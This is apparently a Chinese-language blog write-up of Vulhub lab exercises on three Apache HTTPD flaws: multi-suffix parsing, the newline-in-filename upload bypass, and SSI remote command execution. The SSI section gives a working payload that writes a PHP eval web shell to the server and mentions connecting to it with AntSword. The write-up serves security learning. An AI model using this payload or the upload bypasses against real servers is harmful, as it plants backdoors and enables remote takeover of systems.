Vulhub-httpd

Apache HTTPD 多后缀解析漏洞

由于管理员启用了错误的配置文件导致文件被解析。
以下配置会导致文件后缀中有.php的就会被当作php文件来解析
在这里插入图片描述
测试:
上传一个jpg格式的文件
在这里插入图片描述
访问看看:
发现php代码被解析
在这里插入图片描述

Apache HTTPD 换行解析漏洞(2.4.0~2.4.29)

尝试上传php文件
在这里插入图片描述
在1.php后添加\x0A,再次尝试上传文件:
在这里插入图片描述
访问1.php%0a:
在这里插入图片描述
成功

Apache SSI 远程命令执行漏洞

shtml是标准通用标记语言下的一个应用,包含有嵌入式服务器方包含命令的文本,在被传送给浏览器之前,服务器会对SHTML文档进行完全地读取、分析以及修改。

SSI:服务器端嵌入或者叫服务器端包含,是Server Side Include的简写。SSI技术通过在文档中加入SSI指令,让服务器端在输出文档之前解析SSI指令,并把解析完的结果和文档一同输出给客户端。

SSI的指令格式为:<!-- #directive parameter=“value” -->

其中,directive是指令名,parameter指令参数,value指令参数值

可以看到,就是html注释,事实上,Web服务器开启了SSI,并且页面包含可以解析的指令,那么Web服务器就解析这个指令。没开启器SSI或者开启了SSI,但是不是可以解析的指令,那么都当做注释。

注意的是,“#”要和directive连在一起,中间不能含有空格

SSI包含的指令有

config:修改 SSI 的默认设置
echo:显示环境变量
exec:执行 CGI 脚本
flastmod :显示指定文件的最后修改日期
fsize:显示指定文件的大小
include:把其它文档插入到当前被解析的文档中

这是使用的payload是:

<!--#exec cmd="echo '<?php eval($_POST[a]); ?>'>>1.php" -->

在这里插入图片描述
蚁剑连接
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值